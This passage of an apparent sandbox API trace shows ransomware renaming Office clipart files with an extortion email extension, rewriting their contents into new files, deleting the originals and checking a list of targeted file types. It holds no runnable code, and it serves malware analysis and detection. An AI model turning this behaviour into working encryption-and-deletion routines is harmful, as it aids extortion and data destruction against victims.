(in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.563] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.567] GetLastError () returned 0x0 [0062.567] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x6906, lpOverlapped=0x0) returned 1 [0062.576] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x6910, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x6910, lpOverlapped=0x0) returned 1 [0062.577] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.577] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.577] SetEndOfFile (hFile=0x340) returned 1 [0062.577] CloseHandle (hObject=0x340) returned 1 [0062.578] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.578] SetEndOfFile (hFile=0x370) returned 1 [0062.579] CloseHandle (hObject=0x370) returned 1 [0062.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.580] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf")) returned 1 [0062.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0062.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0062.580] lstrlenW (lpString=".doc") returned 4 [0062.580] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.580] lstrlenW (lpString=".docx") returned 5 [0062.580] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.580] lstrlenW (lpString=".pdf") returned 4 [0062.580] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.580] lstrlenW (lpString=".xls") returned 4 [0062.580] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.580] lstrlenW (lpString=".xlsx") returned 5 [0062.580] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.580] lstrlenW (lpString=".ppt") returned 4 [0062.580] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0062.580] lstrlenW (lpString=".zip") returned 4 [0062.580] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.580] lstrlenW (lpString=".rar") returned 4 [0062.581] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.581] lstrlenW (lpString=".bz2") returned 4 [0062.581] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.581] lstrlenW (lpString=".7z") returned 3 [0062.581] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0062.581] lstrlenW (lpString=".dbf") returned 4 [0062.581] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0062.581] lstrlenW (lpString=".1cd") returned 4 [0062.581] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0062.581] lstrlenW (lpString=".jpg") returned 4 [0062.581] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0062.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0062.581] lstrlenW (lpString=".doc") returned 4 [0062.581] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.581] lstrlenW (lpString=".docx") returned 5 [0062.581] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.581] lstrlenW (lpString=".pdf") returned 4 [0062.581] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.581] lstrlenW (lpString=".xls") returned 4 [0062.581] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.581] lstrlenW (lpString=".xlsx") returned 5 [0062.581] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.581] lstrlenW (lpString=".ppt") returned 4 [0062.581] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0062.581] lstrlenW (lpString=".zip") returned 4 [0062.582] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.582] lstrlenW (lpString=".rar") returned 4 [0062.582] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.582] lstrlenW (lpString=".bz2") returned 4 [0062.582] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.582] lstrlenW (lpString=".7z") returned 3 [0062.582] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0062.582] lstrlenW (lpString=".dbf") returned 4 [0062.582] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0062.582] lstrlenW (lpString=".1cd") returned 4 [0062.582] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 68 [0062.582] lstrlenW (lpString=".jpg") returned 4 [0062.582] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.582] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.582] lstrlenW (lpString="BD00155_.WMF") returned 12 [0062.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.582] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=11636) returned 1 [0062.582] CloseHandle (hObject=0x370) returned 1 [0062.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf")) returned 0x220 [0062.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.583] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.583] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.584] GetLastError () returned 0x0 [0062.584] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x2d74, lpOverlapped=0x0) returned 1 [0062.595] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2d80, lpOverlapped=0x0) returned 1 [0062.596] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.596] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.596] SetEndOfFile (hFile=0x340) returned 1 [0062.596] CloseHandle (hObject=0x340) returned 1 [0062.601] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.601] SetEndOfFile (hFile=0x370) returned 1 [0062.602] CloseHandle (hObject=0x370) returned 1 [0062.602] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.603] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf")) returned 1 [0062.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0062.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0062.603] lstrlenW (lpString=".doc") returned 4 [0062.603] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.603] lstrlenW (lpString=".docx") returned 5 [0062.603] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.603] lstrlenW (lpString=".pdf") returned 4 [0062.603] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.603] lstrlenW (lpString=".xls") returned 4 [0062.603] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.603] lstrlenW (lpString=".xlsx") returned 5 [0062.603] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.603] lstrlenW (lpString=".ppt") returned 4 [0062.603] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0062.603] lstrlenW (lpString=".zip") returned 4 [0062.603] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.603] lstrlenW (lpString=".rar") returned 4 [0062.603] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.604] lstrlenW (lpString=".bz2") returned 4 [0062.604] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.604] lstrlenW (lpString=".7z") returned 3 [0062.604] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0062.604] lstrlenW (lpString=".dbf") returned 4 [0062.604] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0062.604] lstrlenW (lpString=".1cd") returned 4 [0062.604] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0062.604] lstrlenW (lpString=".jpg") returned 4 [0062.604] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0062.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0062.604] lstrlenW (lpString=".doc") returned 4 [0062.604] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.604] lstrlenW (lpString=".docx") returned 5 [0062.604] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.604] lstrlenW (lpString=".pdf") returned 4 [0062.604] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.604] lstrlenW (lpString=".xls") returned 4 [0062.604] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.604] lstrlenW (lpString=".xlsx") returned 5 [0062.604] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.604] lstrlenW (lpString=".ppt") returned 4 [0062.604] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0062.605] lstrlenW (lpString=".zip") returned 4 [0062.605] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.605] lstrlenW (lpString=".rar") returned 4 [0062.605] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.605] lstrlenW (lpString=".bz2") returned 4 [0062.605] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.605] lstrlenW (lpString=".7z") returned 3 [0062.605] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0062.605] lstrlenW (lpString=".dbf") returned 4 [0062.605] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0062.605] lstrlenW (lpString=".1cd") returned 4 [0062.605] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 68 [0062.605] lstrlenW (lpString=".jpg") returned 4 [0062.605] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.605] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.605] lstrlenW (lpString="BD00173_.WMF") returned 12 [0062.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.606] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=16180) returned 1 [0062.606] CloseHandle (hObject=0x370) returned 1 [0062.606] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf")) returned 0x220 [0062.606] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.606] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.606] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.606] GetLastError () returned 0x0 [0062.606] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x3f34, lpOverlapped=0x0) returned 1 [0063.188] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x3f40, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x3f40, lpOverlapped=0x0) returned 1 [0063.191] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.191] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.191] SetEndOfFile (hFile=0x340) returned 1 [0063.191] CloseHandle (hObject=0x340) returned 1 [0063.192] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.192] SetEndOfFile (hFile=0x370) returned 1 [0063.194] CloseHandle (hObject=0x370) returned 1 [0063.194] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.194] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf")) returned 1 [0063.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0063.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0063.194] lstrlenW (lpString=".doc") returned 4 [0063.194] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.195] lstrlenW (lpString=".docx") returned 5 [0063.195] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.195] lstrlenW (lpString=".pdf") returned 4 [0063.195] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.195] lstrlenW (lpString=".xls") returned 4 [0063.195] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.195] lstrlenW (lpString=".xlsx") returned 5 [0063.195] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.195] lstrlenW (lpString=".ppt") returned 4 [0063.195] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0063.195] lstrlenW (lpString=".zip") returned 4 [0063.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.195] lstrlenW (lpString=".rar") returned 4 [0063.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.195] lstrlenW (lpString=".bz2") returned 4 [0063.195] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.195] lstrlenW (lpString=".7z") returned 3 [0063.195] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0063.195] lstrlenW (lpString=".dbf") returned 4 [0063.195] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0063.195] lstrlenW (lpString=".1cd") returned 4 [0063.195] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0063.195] lstrlenW (lpString=".jpg") returned 4 [0063.195] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0063.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0063.195] lstrlenW (lpString=".doc") returned 4 [0063.195] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.195] lstrlenW (lpString=".docx") returned 5 [0063.196] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.196] lstrlenW (lpString=".pdf") returned 4 [0063.196] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.196] lstrlenW (lpString=".xls") returned 4 [0063.196] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.196] lstrlenW (lpString=".xlsx") returned 5 [0063.196] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.196] lstrlenW (lpString=".ppt") returned 4 [0063.196] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0063.196] lstrlenW (lpString=".zip") returned 4 [0063.196] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.196] lstrlenW (lpString=".rar") returned 4 [0063.196] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.196] lstrlenW (lpString=".bz2") returned 4 [0063.196] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.196] lstrlenW (lpString=".7z") returned 3 [0063.196] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0063.196] lstrlenW (lpString=".dbf") returned 4 [0063.196] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0063.196] lstrlenW (lpString=".1cd") returned 4 [0063.196] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0063.196] lstrlenW (lpString=".jpg") returned 4 [0063.196] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.196] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0063.196] lstrlenW (lpString="BD19563_.GIF") returned 12 [0063.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.197] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=20454) returned 1 [0063.197] CloseHandle (hObject=0x370) returned 1 [0063.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif")) returned 0x220 [0063.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.197] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.197] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.197] CreateFileW (lpFileName="C:\\Program 